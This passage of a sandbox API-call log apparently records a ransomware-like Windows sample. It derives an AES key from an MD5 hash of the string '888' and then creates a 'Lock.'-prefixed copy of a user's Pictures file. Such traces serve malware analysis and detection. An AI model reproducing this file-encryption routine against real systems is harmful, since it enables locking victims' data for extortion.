HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.727] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.727] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.727] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0208.727] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0208.727] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.727] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.727] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.727] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.728] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0208.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0208.728] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.728] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.728] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.728] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.728] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.728] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0208.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0208.728] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c088) returned 1 [0208.729] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.729] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.729] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0208.729] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.729] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0208.729] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.729] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.729] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.729] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.729] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.729] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.730] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.730] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.730] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.730] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.730] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.730] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.730] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.730] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.730] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0208.730] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.730] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0208.730] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.730] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.730] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.730] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.730] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.730] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.731] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.731] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.731] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.731] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab230, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0208.731] CryptCreateHash (in: hProv=0xa7c088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0208.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.731] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0208.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.731] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.731] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.731] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0208.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab3b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0208.731] CryptHashData (hHash=0x9e2138, pbData=0x2a71be8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0208.731] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.732] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.732] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.732] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0208.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab188, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0208.732] CryptDeriveKey (in: hProv=0xa7c088, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1ab8) returned 1 [0208.732] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.732] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0208.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0208.732] CryptDestroyHash (hHash=0x9e2138) returned 1 [0208.733] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/619JnEBOuc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\619jnebouc.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0208.733] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.733] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0208.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a745b0 [0208.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.735] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0208.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a745b0 | out: hHeap=0x2af0000) returned 1 [0208.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0208.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0208.735] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.619JnEBOuc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.619jnebouc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0208.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0208.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0208.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0208.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0208.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0208.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0208.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0208.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 